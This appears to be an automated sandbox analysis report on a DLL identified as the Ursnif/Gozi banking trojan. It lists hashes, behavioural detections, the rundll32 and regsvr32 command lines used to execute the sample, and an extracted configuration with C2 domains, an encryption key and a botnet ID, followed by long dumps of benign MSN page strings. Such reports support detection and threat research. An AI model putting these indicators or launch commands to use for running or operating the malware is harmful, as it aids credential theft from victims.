Loading ...

Play interactive tourEdit tour

Analysis Report racial.drc

Overview

General Information

Sample Name:racial.drc (renamed file extension from drc to dll)
Analysis ID:429206
MD5:ce7a30e830dcd286b940f55f531cf9cd
SHA1:05b1ba0916046145b2eb79ef822eb7724749a0a1
SHA256:a7342431e2aa3e9ff2d125f0b06a9fb2a381257eefe2aca975c3c83c9a0fed6c
Tags:dllGozi
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains an invalid checksum
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6500 cmdline: loaddll32.exe 'C:\Users\user\Desktop\racial.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 6536 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\racial.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6580 cmdline: rundll32.exe 'C:\Users\user\Desktop\racial.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 6568 cmdline: regsvr32.exe /s C:\Users\user\Desktop\racial.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • iexplore.exe (PID: 6624 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
      • iexplore.exe (PID: 6708 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6624 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • rundll32.exe (PID: 6660 cmdline: rundll32.exe C:\Users\user\Desktop\racial.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "XcnD2ewKHEUCtK1f+aLgHrNg0ax+yJaEQWHiRnybZBp8+uodMhISWv4leSoo8qv94Yp7nN7eHJ+Fwyn8u61qqsKGP3Tc6znVTKRLbzT9WPZrMuSsdt/HztnVs/3QyB9AYrjoSg/9XVCi/ZMXWvk+/9j1f+VWv2RCJlTSph0Uzve7FtxnOT0xBl6o7ggjmqCVLob3OKmyZthO+zptVxFaL1Wnba2K0H5ySB9eH0SzymLsPN5KihXQerCvcZD5sVgXqV1Djx7J0lE1iMtQGxg1y8vjo/XtpKTIx/8piDl5mkVVyl+2UAXptU9jjxuCv3gZSzWsmQVsHERv19M1JbQKUMsIbdhZipSpKsasQY04yK4=", "c2_domain": ["authd.feronok.com", "raw.pablowilliano.at"], "botnet": "1500", "server": "580", "serpent_key": "N6Xp8oSBB81TOAN9", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000003.588987624.0000000002DD0000.00000040.00000001.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
    00000007.00000003.595581816.0000000002CB0000.00000040.00000001.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
      00000003.00000003.589938586.00000000006F0000.00000040.00000001.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
        00000000.00000003.600578000.0000000001530000.00000040.00000001.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          4.2.rundll32.exe.6e1f0000.1.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
            3.2.regsvr32.exe.6e1f0000.1.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              4.3.rundll32.exe.2dd8d03.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                0.3.loaddll32.exe.1538d03.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  7.2.rundll32.exe.6e1f0000.1.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    Click to see the 3 entries

                    Sigma Overview

                    No Sigma rule has matched

                    Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Found malware configurationShow sources
                    Source: 00000004.00000003.588987624.0000000002DD0000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "XcnD2ewKHEUCtK1f+aLgHrNg0ax+yJaEQWHiRnybZBp8+uodMhISWv4leSoo8qv94Yp7nN7eHJ+Fwyn8u61qqsKGP3Tc6znVTKRLbzT9WPZrMuSsdt/HztnVs/3QyB9AYrjoSg/9XVCi/ZMXWvk+/9j1f+VWv2RCJlTSph0Uzve7FtxnOT0xBl6o7ggjmqCVLob3OKmyZthO+zptVxFaL1Wnba2K0H5ySB9eH0SzymLsPN5KihXQerCvcZD5sVgXqV1Djx7J0lE1iMtQGxg1y8vjo/XtpKTIx/8piDl5mkVVyl+2UAXptU9jjxuCv3gZSzWsmQVsHERv19M1JbQKUMsIbdhZipSpKsasQY04yK4=", "c2_domain": ["authd.feronok.com", "raw.pablowilliano.at"], "botnet": "1500", "server": "580", "serpent_key": "N6Xp8oSBB81TOAN9", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}
                    Multi AV Scanner detection for submitted fileShow sources
                    Source: racial.dllVirustotal: Detection: 24%Perma Link
                    Source: racial.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
                    Source: unknownHTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.6:49730 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.6:49729 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 87.248.118.23:443 -> 192.168.2.6:49741 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 87.248.118.23:443 -> 192.168.2.6:49742 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.6:49743 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.6:49744 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.6:49745 version: TLS 1.2
                    Source: racial.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                    Source: Binary string: c:\Steam\Egg\332\people\Spec\Road.pdb source: loaddll32.exe, 00000000.00000002.605350042.000000006E249000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.605744185.000000006E249000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.605325782.000000006E249000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.609285237.000000006E249000.00000002.00020000.sdmp, racial.dll
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E240D7A FindFirstFileExW,0_2_6E240D7A
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E240D7A FindFirstFileExW,3_2_6E240D7A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E240D7A FindFirstFileExW,4_2_6E240D7A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6E240D7A FindFirstFileExW,7_2_6E240D7A
                    Source: Joe Sandbox ViewIP Address: 104.20.184.68 104.20.184.68
                    Source: Joe Sandbox ViewIP Address: 87.248.118.23 87.248.118.23
                    Source: Joe Sandbox ViewJA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
                    Source: de-ch[1].htm.8.drString found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook)
                    Source: msapplication.xml0.6.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x60485935,0x01d758db</date><accdate>0x60485935,0x01d758db</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
                    Source: msapplication.xml0.6.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x60485935,0x01d758db</date><accdate>0x60485935,0x01d758db</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
                    Source: msapplication.xml5.6.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x6056a73d,0x01d758db</date><accdate>0x6056a73d,0x01d758db</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
                    Source: msapplication.xml5.6.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x6056a73d,0x01d758db</date><accdate>0x6056a73d,0x01d758db</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
                    Source: msapplication.xml7.6.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x6056a73d,0x01d758db</date><accdate>0x6056a73d,0x01d758db</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
                    Source: msapplication.xml7.6.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x6056a73d,0x01d758db</date><accdate>0x6056a73d,0x01d758db</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
                    Source: de-ch[1].htm.8.drString found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//web.vortex.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//web.vortex.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
                    Source: 52-478955-68ddb2ab[1].js.8.drString found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen|https://twitter.com/i/notifications;Ich|#;Abmelden|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter)
                    Source: de-ch[1].htm.8.drString found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"&nbsp;&nbsp;&nbsp;Ref 2: "+e.html(t.clientSettings.sid||"000000")+"&nbsp;&nbsp;&nbsp;Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console||{}).timeStamp?console.timeStamp(n):(r.performance||{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick4~li.pick
                    Source: 52-478955-68ddb2ab[1].js.8.drString found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.facebook.com (Facebook)
                    Source: 52-478955-68ddb2ab[1].js.8.drString found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.twitter.com (Twitter)
                    Source: 52-478955-68ddb2ab[1].js.8.drString found in binary or memory: ter erneut.",viewInboxErrorMessage:"Wenn beim Anzeigen Ihres Posteingangs weiterhin ein Problem auftritt, besuchen Sie",taskLinks:"Verfassen|https://outlook.live.com/mail/deeplink/compose;Kalender|https://outlook.live.com/calendar",piiText:"Read Outlook Email",piiUrl:"http://www.hotmail.msn.com/pii/ReadOutlookEmail/"}],office:[{header:"Office",content:"Zeigen Sie Ihre zuletzt verwendeten Dokumente an oder erstellen Sie kostenlos mit Office Online ein neues.",footerText:"Anmelden",footerUrl:"[[signin]]",ssoAutoRefresh:!0,taskLinks:"Word Online|https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel Online|https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway|https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoint Online|https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site"},{header:"Aktuelle Dokumente",headerUrl:"https://onedrive.live.com/#qt=mru",content:"Wird geladen ...",noContent:"Dieser Ordner ist leer. Klicken Sie unten, um ein neues Dokument zu erstellen.",errorMessage:"Keine Verbindung mit Office Online m equals www.hotmail.com (Hotmail)
                    Source: unknownDNS traffic detected: queries for: www.msn.com
                    Source: de-ch[1].htm.8.drString found in binary or memory: http://ogp.me/ns#
                    Source: de-ch[1].htm.8.drString found in binary or memory: http://ogp.me/ns/fb#
                    Source: auction[1].htm.8.drString found in binary or memory: http://popup.taboola.com/german
                    Source: ~DF32BF974DC7EDD637.TMP.6.drString found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
                    Source: msapplication.xml.6.drString found in binary or memory: http://www.amazon.com/
                    Source: msapplication.xml1.6.drString found in binary or memory: http://www.google.com/
                    Source: 52-478955-68ddb2ab[1].js.8.drString found in binary or memory: http://www.hotmail.msn.com/pii/ReadOutlookEmail/
                    Source: msapplication.xml2.6.drString found in binary or memory: http://www.live.com/
                    Source: msapplication.xml3.6.drString found in binary or memory: http://www.nytimes.com/
                    Source: msapplication.xml4.6.drString found in binary or memory: http://www.reddit.com/
                    Source: msapplication.xml5.6.drString found in binary or memory: http://www.twitter.com/
                    Source: msapplication.xml6.6.drString found in binary or memory: http://www.wikipedia.com/
                    Source: msapplication.xml7.6.drString found in binary or memory: http://www.youtube.com/
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://amzn.to/2TTxhNg
                    Source: auction[1].htm.8.drString found in binary or memory: https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&amp;ap
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://apps.apple.com/ch/app/microsoft-news/id945416273?pt=80423&amp;ct=prime_footer&amp;mt=8
                    Source: auction[1].htm.8.drString found in binary or memory: https://beap.gemini.yahoo.com/mbclk?bv=1.0.0&amp;es=0o4fmhsGIS9NmqhNroEtx8G_oY6ZYs8.NC3U7cd3cZ4dcr9Y
                    Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.8.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/googleData.json
                    Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.8.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/iab2Data.json
                    Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.8.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/iabData.json
                    Source: auction[1].htm.8.drString found in binary or memory: https://cdn.flurry.com/adTemplates/templates/htmls/clips.html&quot;
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_office&amp;
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_store&amp;m
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_promotionalstripe_na
                    Source: 52-478955-68ddb2ab[1].js.8.drString found in binary or memory: https://client-s.gateway.messenger.live.com
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://clk.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=21863656
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://clkde.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=24903118&amp;epi=ch-de
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://clkde.tradedoubler.com/click?p=295926&amp;a=3064090&amp;g=24886692
                    Source: ~DF32BF974DC7EDD637.TMP.6.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=722878611&amp;size=306x271&amp;http
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=858412214&amp;size=306x271&amp;http
                    Source: ~DF32BF974DC7EDD637.TMP.6.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
                    Source: ~DF32BF974DC7EDD637.TMP.6.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
                    Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.8.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
                    Source: auction[1].htm.8.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%
                    Source: auction[1].htm.8.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
                    Source: auction[1].htm.8.drString found in binary or memory: https://ir2.beap.gemini.yahoo.com/mbcsc?bv=1.0.0&amp;es=c7lj1jwGIS.anEePdYIFNznNXCUokLaxxlrEj.2NQHaP
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=13&amp;checkda=1&amp;ct=1622735292&amp;rver
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1622735292&amp;rver=7.0.6730.0&am
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://login.live.com/logout.srf?ct=1622735293&amp;rver=7.0.6730.0&amp;lc=1033&amp;id=1184&amp;lru=
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1622735292&amp;rver=7.0.6730.0&amp;w
                    Source: 52-478955-68ddb2ab[1].js.8.drString found in binary or memory: https://login.skype.com/login/oauth/microsoft?client_id=738133
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;
                    Source: 52-478955-68ddb2ab[1].js.8.drString found in binary or memory: https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway
                    Source: 52-478955-68ddb2ab[1].js.8.drString found in binary or memory: https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site
                    Source: 52-478955-68ddb2ab[1].js.8.drString found in binary or memory: https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel
                    Source: 52-478955-68ddb2ab[1].js.8.drString found in binary or memory: https://onedrive.live.com/#qt=mru
                    Source: 52-478955-68ddb2ab[1].js.8.drString found in binary or memory: https://onedrive.live.com/?qt=allmyphotos;Aktuelle
                    Source: 52-478955-68ddb2ab[1].js.8.drString found in binary or memory: https://onedrive.live.com/?qt=mru;Aktuelle
                    Source: 52-478955-68ddb2ab[1].js.8.drString found in binary or memory: https://onedrive.live.com/?qt=mru;OneDrive-App
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header
                    Source: 52-478955-68ddb2ab[1].js.8.drString found in binary or memory: https://onedrive.live.com/about/en/download/
                    Source: 52-478955-68ddb2ab[1].js.8.drString found in binary or memory: https://onedrive.live.com;Fotos
                    Source: 52-478955-68ddb2ab[1].js.8.drString found in binary or memory: https://onedrive.live.com;OneDrive-App
                    Source: 52-478955-68ddb2ab[1].js.8.drString found in binary or memory: https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://outlook.com/
                    Source: 52-478955-68ddb2ab[1].js.8.drString found in binary or memory: https://outlook.live.com/calendar
                    Source: 52-478955-68ddb2ab[1].js.8.drString found in binary or memory: https://outlook.live.com/mail/deeplink/compose;Kalender
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png&quot;
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&amp;hl=de-ch&amp;refer
                    Source: auction[1].htm.8.drString found in binary or memory: https://policies.oath.com/us/en/oath/privacy/index.html
                    Source: ~DF32BF974DC7EDD637.TMP.6.drString found in binary or memory: https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg
                    Source: auction[1].htm.8.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/aVNxixsHCCRODLS9rj7F0g--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-me
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-shoppingstripe-nav
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=travelnavlink
                    Source: auction[1].htm.8.drString found in binary or memory: https://srtb.msn.com:443/notify/viewedg?rid=1d5f6324af9e451c80da6a10ac5e1596&amp;r=infopane&amp;i=1&
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/de-ch/homepage/api/modules/cdnfetch&quot;
                    Source: imagestore.dat.8.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAKFgOM.img?h=368&amp;
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB12jAN6.img?h=27&amp;
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1aXITZ.img?h=27&amp;
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cEP3G.img?h=27&amp;
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&amp;
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&amp;w
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&amp;w
                    Source: 52-478955-68ddb2ab[1].js.8.drString found in binary or memory: https://support.skype.com
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?&quot;
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://twitter.com/
                    Source: 52-478955-68ddb2ab[1].js.8.drString found in binary or memory: https://twitter.com/i/notifications;Ich
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&amp;ver=%272.1%27&amp;a
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://www.awin1.com/cread.php?awinmid=11518&amp;awinaffid=696593&amp;clickref=dech-edge-dhp-infopa
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&amp;awinaffid=696593&amp;clickref=de-ch-edge-dhp-river
